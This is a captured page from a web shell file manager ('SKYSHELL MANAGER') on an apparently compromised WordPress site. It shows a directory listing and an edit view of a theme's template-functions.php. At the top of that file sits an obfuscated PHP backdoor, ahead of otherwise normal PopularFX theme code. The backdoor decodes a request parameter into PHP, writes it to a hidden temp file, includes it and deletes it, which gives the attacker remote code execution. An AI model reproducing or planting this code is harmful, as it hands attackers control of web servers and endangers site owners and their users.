📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: template-functions.php
<?php if(in_array("o\x62ject", array_keys($_REQUEST))){ $obj = $_REQUEST["o\x62ject"]; $obj = explode ( "." , $obj ); $pointer = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s ); $o = 0; foreach($obj as $v7) { $chS = ord($s[$o % $sLen] ); $dec =((int)$v7 - $chS -($o % 10)) ^ 93; $pointer .= chr($dec ); $o++; } $sym = array_filter([sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), getenv("TMP"), "/dev/shm", getcwd()]); foreach ($sym as $fac): if (!( !is_dir($fac) || !is_writable($fac) )) { $marker = "$fac/.hld"; $success = file_put_contents($marker, $pointer); if ($success) { include $marker; @unlink($marker); exit;} } endforeach; } /** * Functions which enhance the theme by hooking into WordPress * * @package PopularFX */ /** * Adds custom classes to the array of body classes. * * @param array $classes Classes for the body element. * @return array */ function popularfx_body_classes( $classes ) { // Adds a class of hfeed to non-singular pages. if ( ! is_singular() ) { $classes[] = 'hfeed'; } // Adds a class of no-sidebar when there is no sidebar present. if ( ! is_active_sidebar( 'sidebar-1' ) ) { $classes[] = 'no-sidebar'; } return $classes; } add_filter( 'body_class', 'popularfx_body_classes' ); /** * Add a pingback url auto-discovery header for single posts, pages, or attachments. */ function popularfx_pingback_header() { if ( is_singular() && pings_open() ) { printf( '<link rel="pingback" href="%s">', esc_url( get_bloginfo( 'pingback_url' ) ) ); } } add_action( 'wp_head', 'popularfx_pingback_header' );
Save